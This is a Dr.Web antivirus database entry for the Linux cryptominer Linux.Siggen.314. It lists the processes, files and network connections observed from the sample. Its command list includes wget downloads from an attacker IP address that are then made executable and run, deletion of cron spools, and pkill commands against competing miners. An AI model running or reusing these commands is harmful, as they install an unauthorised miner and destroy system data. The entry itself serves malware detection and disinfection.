Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte
Soporte 24 horas | Normas de contactar

Sus solicitudes

Perfil

Linux.Siggen.314

Added to the Dr.Web virus database: 2017-12-06

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/sh <SAMPLE_FULL_PATH> -c
  • ps auxf
  • grep -v 685
  • grep \-c
  • awk {print $2}
  • xargs kill -9
  • kill -9 100 680 689
  • head -1
  • ps auxw
  • sort -rn -k3
  • awk {if($3>40.0) print \"ps -ef|grep \" $2}
  • sh
  • grep -v grep
  • awk {print \"kill -9 \"$3}
  • awk {if($3>40.0) print \"kill -9 \" $2}
  • grep -w .sh
  • grep tmp
  • ps -ef
  • kill -9
  • grep -w tmp
  • grep -w /bin/sh
  • grep -w /bin/bash
  • kill -9 682
  • grep .so
  • cut -c 9-15
  • kill -9 3
  • grep -w .so
  • rm -Rrf /var/spool/cron/atjobs /var/spool/cron/atspool /var/spool/cron/crontabs
  • rm -Rrf /var/spool/cron/*
  • pkill -f stratum
  • pkill -f wget
  • pkill -f sleep
  • pkill -f irqba2anc1
  • pkill -f irqba5xnc1
  • pkill -f irqbnc1
  • pkill -f conns
  • pkill -f irqbalance
  • pkill -f crypto-pool
  • pkill -f minexmr
  • pkill -f XJnRj
  • pkill -f NXLAi
  • pkill -f BI5zj
  • pkill -f askdljlqw
  • pkill -f minerd
  • pkill -f minergate
  • pkill -f Guard.sh
  • pkill -f ysaydh
  • pkill -f bonns
  • pkill -f donns
  • pkill -f kxjd
  • pkill -f polkitd
  • pkill -f acpid
  • rm -rf /tmp/apaceha
  • head /dev/urandom
  • tr -dc a-z
  • head -c 6
  • head -c 7
  • head -c 5
  • grep jorqfb
  • wc -l
  • uname -a
  • grep x86_64
  • wget -O /root/jorqfb http://45.76.102.45/watchcat32
  • chmod +x /root/jorqfb
  • sleep 2
  • nohup /root/jorqfb
  • /root/jorqfb
  • /bin/bash /root/jorqfb -c exec '/root/jorqfb' \"$@\" /root/jorqfb
  • /bin/bash /root/jorqfb -c
  • grep -E wget|curl
  • grep -v 45.76.102.45
  • grep -v 795
  • rm -f /root/jorqfb
  • grep waiduqt
  • ps -fe
  • grep -v defunct
  • wget 45.76.102.45/minerd32 -O /root/waiduqt
  • chmod +x /root/waiduqt
  • wget -O /root/qjfon http://45.76.102.45/httpd1
  • sleep 5
  • nohup /root/waiduqt -c /root/qjfon
  • /root/waiduqt -c /root/qjfon
  • rm -rf /root/qjfon
  • rm -f /root/waiduqt
  • rm -f /tmp/apaceha
  • sleep 20
Kills the following processes:
  • ext4-rsv-conver
  • bash
  • /bin/grep
  • run.sh
  • ksoftirqd/0
  • acpid
Performs operations with the file system:
Modifies file access rights:
  • /root/jorqfb
  • /root/waiduqt
Creates or modifies files:
  • /root/.bashrc
  • /root/jorqfb
  • /root/waiduqt
  • /root/qjfon
Deletes files:
  • /root/.SEQ
  • /var/spool/cron/*
  • /tmp/apaceha
  • /root/jorqfb
  • /root/qjfon
  • /root/waiduqt
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 13#.###.88.145:45560
  • 17#.#.47.243:45560
  • 94.###.9.194:45560
  • 78.##.23.253:45560
  • 13#.##3.94.27:45560
  • 94.###.64.225:45560
  • 17#.#.147.178:45560
  • 13#.###.102.157:45560
  • 17#.#.0.89:45560
  • 94.###.48.154:45560
  • 46.#.#20.155:45560
HTTP GET requests:
  • 45.##.#02.45/watchcat32
  • 45.##.#02.45/minerd32
  • 45.##.102.45/httpd1
DNS ASK:
  • xm#.###l.minergate.com
Sends data to the following servers:
  • 13#.###.88.145:45560
Receives data from the following servers:
  • 13#.###.88.145:45560
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number